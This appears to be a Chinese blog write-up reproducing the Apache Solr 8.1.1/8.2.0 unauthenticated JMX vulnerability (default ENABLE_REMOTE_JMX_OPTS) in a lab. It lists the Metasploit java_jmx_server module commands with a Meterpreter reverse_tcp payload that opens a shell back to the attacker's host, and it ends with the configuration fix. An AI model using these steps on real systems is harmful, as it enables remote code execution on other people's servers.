Solr是一个独立的企业级搜索应用服务器,它对外提供相似于Web-service的API接口。用户能够经过http请求,向搜索引擎服务器提交必定格式的XML文件,生成索引;也能够经过Http Get操做提出查找请求,并获得XML格式的返回结果。
该漏洞源于默认配置文件solr.in.sh中的ENABLE_REMOTE_JMX_OPTS配置选项存在安全风险。
Apache Solr的8.1.1和8.2.0版本的自带配置文件solr.in.sh中存在ENABLE_REMOTE_JMX_OPTS="true"选项。
若是使用受影响版本中的默认solr.in.sh文件,那么将启用JMX监视并将其暴露在RMI_PORT上(默认值= 18983),
而且无需进行任何身份验证。 若是防火墙中的入站流量打开了此端口,则具备Solr节点网络访问权限的任何人都将可以访问JMX,
而且能够上传恶意代码在Solr服务器上执行。该漏洞不影响Windows系统的用户,仅影响部分版本的Linux用户。java
Apache Solr8.1.1版本上线时间:2019-05-28
Apache Solr8.2.0版本上线时间:2019-07-25docker
若是受害者使用了该默认配置,则会在默认端口18983开放JMX服务,且默认未开启认证。任何可访问此端口的***者可利用此漏洞向受影响服务发起***,执行任意代码。apache
Java环境和kali系统、Solr 8.20
Solr 8.20 下载地址:
wget http://archive.apache.org/dist/lucene/solr/8.2.0/solr-8.2.0.zip
使用unzip solr-8.2.0.zip解压
解压完成后,切换到bin目录启动Solr
./solr start -force
启动后访问:http://192.168.10.176:8983/安全
***机:kali IP:192.168.10.147
受害机:Ubuntu18.6中docker IP:192.168.10.184:8983服务器
1.使用nmap扫描端口后发现18983端口开启
2.使用Metasploit中的exploit/multi/misc/java_jmx_server模块进行漏洞复现
use exploit/multi/misc/java_jmx_server
set RHOST 192.168.10.184
set RPORT 18983
再来设置payload:java/meterpreter/reverse_tcp
set payload java/meterpreter/reverse_tcp
set LHOST 192.168.10.147
set LPORT 4444
3.使用run执行,便可看到成功创建链接网络
将solr.in.sh配置文件中的ENABLE_REMOTE_JMX_OPTS选项设置为false,而后重启Solr服务。tcp